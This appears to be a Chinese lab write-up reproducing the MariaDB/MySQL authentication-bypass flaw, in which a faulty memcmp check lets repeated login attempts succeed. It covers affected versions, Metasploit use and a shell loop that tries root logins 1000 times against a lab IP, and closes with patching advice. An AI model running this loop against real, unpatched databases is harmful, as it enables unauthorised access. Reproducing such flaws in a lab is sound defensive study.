赞
踩
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
拉去镜像环境
查看mysql版本,符合复现环境
执行msfconsole
run也可以用exploit替代
执行下面的循环尝试破解
- for i in `seq 1 1000`;do mysql -uroot -p123456 -h 192.168.182.131 -P3306;done
-
- # -u 指定用户名
- # -p 指定密码
- # -h 指定ip
- # -P 指定端口
- # for i in `seq 1 1000` 循环1-1000次
数据库默认账号:root,密码:123456
1、升级官方补丁
2、更新mysql
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。